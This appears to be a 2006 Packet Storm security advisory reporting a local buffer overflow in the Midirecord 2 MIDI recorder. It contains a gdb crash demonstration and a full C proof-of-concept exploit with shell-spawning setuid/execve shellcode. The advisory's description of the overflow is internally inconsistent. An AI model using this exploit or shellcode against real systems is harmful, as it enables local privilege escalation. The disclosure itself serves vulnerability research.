exploit the possibilities

Echo Security Advisory 2006.41

Echo Security Advisory 2006.41
Posted Jul 28, 2006
Authored by Echo Security, Dedi Dwianto | Site advisories.echo.or.id

A buffer overflow exists in Midirecord version 2. Proof of concept exploit provided.

tags | exploit, overflow, proof of concept
MD5 | fc81466e1dcadefc6a25ff15441d3b9b

Echo Security Advisory 2006.41

Change Mirror Download
ECHO_ADV_41$2006

---------------------------------------------------------------------------
[ECHO_ADV_41$2006] BufferOverflow in Midirecord2
---------------------------------------------------------------------------

Author : Dedi Dwianto
Date : July, 25th 2006
Location : Indonesia, Jakarta
Web : http://advisories.echo.or.id/adv/adv41-theday-2006.txt
Exploitation : Local
Critical Lvl : High
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application : Midirecord
version : 2
URL : http://tuma.stc.cx/progs.php
Description :
Midirecord is a simple command-line application to record a MIDI file with your
MIDI keyboard. It also features automatic recording to a MIDI file when you play
electric piano, and thus it may be used as a "recording daemon".

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~
The function daemon in affected by a bufferoverflow which could allow
an attacker to execute malicious code from local.
The problem is caused by the copyung of a string of max 10 bytes in the filename
buffer of only 50 bytes.

------------------midirecord.cc-----------------------------
void daemon(FILE* fin)
{
char filename[50];
printf("Waiting for note-on event.\n");
while(cont)
{
unsigned char status;
fread(&status, 1, 1, fin); // read status
if(status>>4 == 0x9)
{
get_datestr(filename);
printf("Starting to record to %s.\n",filename);
recordmidi(fin, filename);
if(cont)
printf("Finished. Starting to wait for note-on event.\n");
}
}

}
----------------------------------------------------------

POC:
~~~~
$gdb midirecord
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) r `perl -e 'print "A" x 10000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/midirecord2c/midirecord `perl -e 'print "A" x 10000'`
Waiting for note-on event.

Program received signal SIGSEGV, Segmentation fault.
0xb7dcb4b0 in fread () from /lib/tls/i686/cmov/libc.so.6
(gdb)

-------Exploit Code-------
/* Succesfull Exploit in Ubuntu Breezey */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 225
#define ALIGNMENT 1
int main(int argc, char **argv )
{
char shellcode[]=
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80";

if(argc < 2)
{
fprintf(stderr, "Use : %s <path_to_vuln>\n", argv[0]);
return 0;
}
char *env[] = {shellcode, NULL};
char buf[BUFSIZE];
int i;
int *ap = (int *)(buf + ALIGNMENT);
int ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);

for (i = 0; i < BUFSIZE - 4; i += 4)
*ap++ = ret;
execle(argv[1], "/dev/midi1", buf, NULL, env);

}

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous
~ My Lovely Jessy
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close